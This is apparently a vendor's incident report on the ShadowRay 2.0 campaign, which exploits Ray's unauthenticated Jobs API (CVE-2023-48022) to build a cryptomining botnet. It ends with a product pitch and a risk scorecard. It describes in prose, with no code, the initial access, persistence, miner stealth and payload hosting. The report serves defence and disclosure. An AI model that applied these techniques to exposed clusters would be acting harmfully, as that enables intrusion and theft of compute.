ShadowRay 2.0: Global AI-Infrastructure Botnet via Ray Flaw

Key Takeaways

• The campaign exploits a critical remote-code-execution vulnerability in Ray (CVE-2023-48022) via its Jobs API — no authentication required when dashboards or job endpoints are exposed.
• Attackers operate under the alias IronErn440 and have weaponized legitimate orchestration and scheduling features in Ray to create a self-propagating GPU/CPU botnet.
• The scope is large — recent scans show over 230,000 Ray servers exposed to the internet, far more than the “few thousand” initially identified in 2024.
• Beyond cryptomining, attackers reportedly deploy multi-stage payloads for data exfiltration, credential theft, DDoS, and persistent remote-access backdoors using the same compromised infrastructure.
• The campaign demonstrates “AI attacking AI” — leveraging automated orchestration, payload generation (with possible use of LLMs), and cluster automation to scale attacks across hundreds of targets.

Summary

What began as a design-assumption vulnerability in an open-source AI orchestration framework has evolved into one of the most significant AI-infrastructure attacks to date. In November 2025, researchers from Oligo Security disclosed that threat actors had launched a global campaign — ShadowRay 2.0 — exploiting CVE-2023-48022 in Ray to hijack exposed clusters and turn them into a sprawling botnet.

Using unauthenticated Jobs APIs and dashboards, attackers submitted malicious jobs that executed arbitrary code. Once inside, they deployed cryptominers (using XMRig), set up persistence (cron jobs, malicious services), and used Ray’s scheduling and orchestration features to spread laterally across nodes and clusters. The campaign’s automation — including AI-generated payloads and DevOps-style distribution pipelines via GitLab and GitHub — reveals a chilling new paradigm: AI infrastructure used as attack infrastructure against AI itself. (The Hacker News)

Given the surge in number of exposed Ray environments, and the ease of exploitation using only exposed public endpoints, this incident underlines urgent security failings across AI-infrastructure deployment practices.

What Happened: Attack Overview

• Vulnerability exploited: CVE-2023-48022 — Ray’s Jobs API lacks authentication if exposed. (SecurityWeek)
• Initial access: Attackers scanned for publicly exposed Ray dashboards or job endpoints, then submitted malicious jobs that ran Bash/Python payloads with cluster-level privileges.
• Payload & propagation: Once executed, the payload installed cryptominers (XMRig), established persistence (cron, services), and used Ray’s orchestration to pivot to other nodes or clusters — effectively turning the cluster into a self-propagating botnet. (BleepingComputer)
• Stealth tactics: To evade detection, miners capped resource usage (~60% CPU/GPU), disguised as legitimate services, killed competing miners, and hid GPU usage from monitoring dashboards. (
• Adversary infrastructure: Attackers used public DevOps platforms (GitLab, GitHub) to host and deliver payloads; when one repo was taken down (Nov 5, 2025), they rapidly re-hosted on GitHub within days — showing operational agility.

Impact: Why It Matters

• Massive scale & scope: With hundreds of thousands of exposed Ray clusters globally, the attack surface is enormous and still growing, especially as AI adoption climbs in enterprises, research labs, and startups.
• Infrastructure as attack surface: Once just “compute,” GPU/AI clusters have become first-class targets — capable of cryptomining, data theft, DDoS or further lateral attacks across cloud environments.
• Cross-tenant and supply-chain risk: Shared infrastructure, cloud-hosted AI services, and poorly isolated clusters mean one compromised node could endanger many customers or clients.
• Ease of exploitation: Exploit requires minimal technical sophistication — unauthenticated API, public endpoint, simple job submission — making it accessible even to moderately skilled attackers.
• Stealth & persistence: Use of orchestration, resource-throttling, process masquerading, and automated tooling makes detection difficult, reducing likelihood of timely remediation or containment.

ShadowRay 2.0 may be the first large-scale “AI-infrastructure vs AI-infrastructure” campaign — but it's unlikely the last.

PointGuard AI Perspective

This breach confirms a fundamental truth: securing AI infrastructure is just as important as securing models or data.

With PointGuard AI, organizations can defend against threats like ShadowRay by leveraging:

• Comprehensive infrastructure discovery & asset inventory — identifying all AI orchestration frameworks (Ray, clusters, dashboards, job endpoints) across cloud, on-prem, and hybrid environments
• Configuration posture checks & network-hardening enforcement — ensuring dashboards and APIs are never publicly exposed, enforcing authentication, firewall/VPC isolation, and least-privilege rules
• Runtime behavior monitoring & anomaly detection — flagging suspicious job submissions, unusual compute workloads, hidden miners, or lateral job propagation indicative of compromise
• Supply-chain / dependency risk management — treating orchestration frameworks and cluster configurations as part of the AI SBOM, ensuring updates, mitigations, and audit history are maintained
• Incident response & containment orchestration — rapid identification of affected clusters, isolation of compromised compute, credential revocation, and forensic analysis

For any organization running AI workloads at scale — especially with GPU clusters or distributed compute — ShadowRay 2.0 is a warning: if you treat infrastructure as generic cloud compute, you risk becoming part of the botnet.

Incident Scorecard Details

Total AISSI Score: 7.8 / 10

Criticality = 8, High — complete cluster takeover, potential data/model theft, cryptojacking, and persistent access.
Propagation = 8, Large — hundreds of thousands of exposed Ray clusters globally, active exploitation, self-spreading botnet.
Exploitability = 8, High — requires only public exposure and no authentication; exploit trivially via job submission.
Supply Chain = 8, High — flaw lies in widely used open-source orchestration framework; many deployments remain unpatched or misconfigured.
Business Impact = 7, Broad — risk to compute costs, data security, model integrity, regulatory compliance, and reputational damage.

Sources

• CybersecurityNews — New ShadowRay Attack Exploit Ray AI-Framework Vulnerability to Attack AI Systems (Nov 19, 2025) (Cyber Security News)
• SecurityWeek — Two-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign (Nov 19, 2025) (SecurityWeek)
• The Hacker News — ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet (Nov 20, 2025) (The Hacker News)
• BleepingComputer — New ShadowRay attacks convert Ray clusters into crypto miners (Nov 18, 2025) (BleepingComputer)
• eSecurity Planet — ShadowRay 2.0 Exploits Ray Vulnerability to Hijack AI Clusters (Nov 19, 2025) (eSecurity Planet)